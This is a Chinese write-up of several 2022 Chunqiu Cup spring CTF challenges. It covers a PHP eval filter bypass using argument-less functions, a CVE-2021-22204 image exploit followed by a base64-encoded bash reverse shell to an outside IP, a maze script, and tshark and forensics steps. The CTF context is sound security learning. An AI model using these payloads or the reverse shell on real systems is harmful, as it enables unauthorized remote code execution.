首页 > 其他分享 >2022年春秋杯春季-勇者山峰-部分WriteUp

2022年春秋杯春季-勇者山峰-部分WriteUp

时间:2022-11-23 23:14:14浏览次数:78  
标签:0x0 ss WriteUp 0x1 cmd 勇者 2022 ip apache

关注公众号

看图弹钢琴得到flag

2、Mercy-code

<?php

highlight_file(__FILE__);

if ($_POST['cmd']) {

$cmd = $_POST['cmd'];

if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) {

if (preg_match('/file|if|localeconv|phpversion|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log|var_dump|pos|current|array|time|se|ord/i', $cmd)) {

die('What are you thinking?');

} else {

eval($cmd);

}

} else {

die('Please calm down');

}

}

过滤了好多,查找php无参函数得到apache_request_headers()

apache_request_headers() // 获取请求头,但无法找到自定义头

end(apache_request_headers() // 输出80

ceil(sinh(cosh(tan(ceil(cosh(sin(tan(end(apache_request_headers()))))))))) // 通过运算得到 46

chr(46) // .

然后即可得到如下:

payload:

cmd=show_source(end(scandir(chr(ceil(sinh(cosh(tan(ceil(cosh(sin(tan(end(apache_request_headers())))))))))))));

3、tiger

png-key.txt里面的key先rot47解密一下,然后是lsb加密隐写,密码是

套了个明文攻击

得到一个二维码,微信扫码得到f‍‍‍‌‍‍‍‌‌‌‌‌‌‍‍‌‍‍‌‌‍‌‍‍‌‌‌‍‍‌‍‍‍‍‌‌‍‌‌‍‌‍‍‌‌‍‌‌‍‌‌‌‌‍‍‌‌‍‌‍‌‍‍‍‍‍‌‍‌‌‌‌‌‌‍‍‌‍‌‍‌‌‌‌‌‍‍‌‍‌‍‌‍‌‍‍‌‍‌‍‌‍‌‍‌‌‍‌‌‍‌‌‌‌‍‌‌‌‍‌‍‍‌‌‍‌‌‍‌‌‍‌‌‍‌‍‌‌‌‌‍‌‌‌‌‍‌‍‌‌‌‍‌‌‌‌‍‍‍lag is not here,零宽

这个不行

得到一串密文

维吉尼亚爆破得到:

5、被带走的机密文件

取证大师一把索,flag在打印记录里:

6、picture convert

https://github.com/trganda/CVE-2021-22204获得flag1

反弹shell:echo YmFzaCAtaSA+JiAvZGV2L3RjcC84Mi4xNTcuMTc0LjIyNi85OTk5IDA+JjE=|base64 -d|bash -i

再次访问/convert,获得flag2

7、ezam

控制流平坦化混淆,找个脚本去一下混淆

去完混淆后,可以分析出主要逻辑:先将输入的十进制数转换为四进制数,然后上下左右是0213,然后就是迷宫了

根据主要逻辑写脚本:

# -*- coding:utf-8 -*-

# 0x1,0x0,0x0,0x0,0x0,0x0,0x1,0x1,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x1,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,

# 0x1,0x1,0x0,0x0,0x0,0x1,0x1,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,

# 0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x1,0x1,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,

# 0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,

# 0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,

# 0x0,0x1,0x1,0x0,0x1,0x1,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x1,0x0,0x0,0x1,0x1,0x0,0x0,0x0,0x0,

# 0x0,0x0,0x1,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x1,0x1,0x0,0x0,0x1,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x0,

# 0x0,0x0,0x1,0x1,0x1,0x0,0x0,0x0,0x1,0x0,0x1,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x0,

# 0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,

# 0x0,0x0,0x0,0x1,0x0,0x0,0x1,0x0,0x1,0x0,0x0,0x0,0x1,0x1,0x0,0x1,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,

# 0x0,0x0,0x0,0x1,0x0,0x1,0x1,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x1,0x0,0x0,0x0,

# 0x0,0x1,0x0,0x1,0x1,0x1,0x0,0x0,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x1,0x0,0x0,0x1,0x1,0x0,0x0,0x0,0x0,

# 0x0,0x1,0x1,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,

# 0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x1,0x1,0x1,0x0,0x0,0x0,0x1,0x1,0x0,0x0,0x0,0x1,0x1,0x0,0x0,0x0,

# 0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x1,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,

# 0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,

#

# 上0 下2 左1 右3

#

# sdssssdssddwwdwwwwdwddssssdddddddssssdddddddw

s="sdssssdssddwwdwwwwdwddssssdddddddssssdddddddd"

ss=""

for c in s:

if c=="w":

ss+="0"

elif c=="s":

ss+="2"

elif c=="a":

ss+="1"

else:

ss+="3"

print(ss)

#232222322330030000303322223333333222233333333

res="232222322330030000303322223333333222233333333"

sum=0

for i in range(len(res)):

sum+=int(res[i])*(4**(len(res)-1-i))

print(sum)

flag{902741462666576198076399615}

9、RecoverMe

先一个一个手撸字典(折磨)得到密钥应该是:aaaAAA111,挂载上去发现没什么有用的

假flag和提示

用passware恢复一下试试

因为之前已经手撸出秘钥了,所以我们自己导入的字典只需要放正确的那个就行了

得到一个未加密的磁盘文件

然后用FTK挂载,发现一个流量包:

流量包中发现传输的数据长度隐藏的有压缩包数据,tshark提出来:

tshark -r ./secret.pcapng -T fields -e data.len -Y "ip.src==192.168.43.186" > 1.txt

提示ip的变化

将所有ip也导出来:

tshark -r ./secret.pcapng -T fields -e ip.dst -Y "ip.src==192.168.43.186" > 2.txt

2个ip分别对应0和1,得到密码:

passwordh3r3

 

标签:0x0,ss,WriteUp,0x1,cmd,勇者,2022,ip,apache
From: https://www.cnblogs.com/rule-linux/p/16920433.html

相关文章

  • 2022年强网杯青少年专项赛-部分WRITEUP
     Web1(题目序号请参考解题总榜上面的序号)操作内容:如该题使用自己编写的脚本代码请详细写出,不允许截图提示存在cve-2021-41773漏洞,那就直接执行命令看/flagPOST......
  • 2022-11-23 Acwing每日一题
    本系列所有题目均为Acwing课的内容,发表博客既是为了学习总结,加深自己的印象,同时也是为了以后回过头来看时,不会感叹虚度光阴罢了,因此如果出现错误,欢迎大家能够指出错误,我......
  • 2022.11.23
    倒计时2天了!$$困~~~~用我前天买的奶茶的杯子泡上咖啡,这个杯子真的好大!用它喝水好有牌面。嫖题,嫖题!8:35开始!$$T1什么东西?dp?还是个小清新题?T2什么东西?T3......
  • 【2022.11.23】爬虫基础(1)
    内容概要1.爬虫介绍2.requests模块发送get请求3.get请求携带参数4.携带请求头5.携带cookie6.发送post请求7.响应Response8.获取二进制数据9.解析json内容详......
  • #yyds干货盘点#【愚公系列】2022年11月 微信小程序-地图的使用之API相关函数案例
    前言地图基础属性:属性类型默认值必填说明最低版本longitudenumber是中心经度1.0.0latitudenumber是中心纬度1.0.0scalenumber16否缩放......
  • 【2022-11-23】luffy项目实战(十三)
    一、前期准备1.云服务器购买阿里云服务器:https://www.aliyun.com/?spm=5176.13735996.J_3207526240.1.555e3c60eweQIY腾讯云服务器:https://cloud.tencent.com/......
  • P8818 [CSP-S 2022] 策略游戏
    [CSP-S2022]策略游戏实际上就是先手的那个人取保底,后手的那个人取此刻的最佳值。我一开始以为两个人都取保底,谁想到这么没意思……那么就是线段树小应用,分别维护区间......
  • P8817 [CSP-S 2022] 假期计划
    [CSP-S2022]假期计划我第一眼看的时候怎么搞都会多一个\(O(\logn)\),还在想是不是有什么高深做法……然后想到边权为\(1\)的时候好像根本不需要用Dijkstra,直接BFS......
  • 强网杯_部分WriteUp
    签到打开得到flagFalg=flag{we1come_t0_qwb_s6}GameMaster21点游戏和打游戏没有太多关系直接分析重要的函数goldFunc就可以看到是异或+AES然后对我们的文件进行解密解......
  • P8819 [CSP-S 2022] 星战
    [CSP-S2022]星战这么长时间过去都快不会写题解了。嗯……不过还是稍微记一下会比较好。题意看完之后就是让我们去判断整张图是否是一个内向基环树森林。然后这个事情......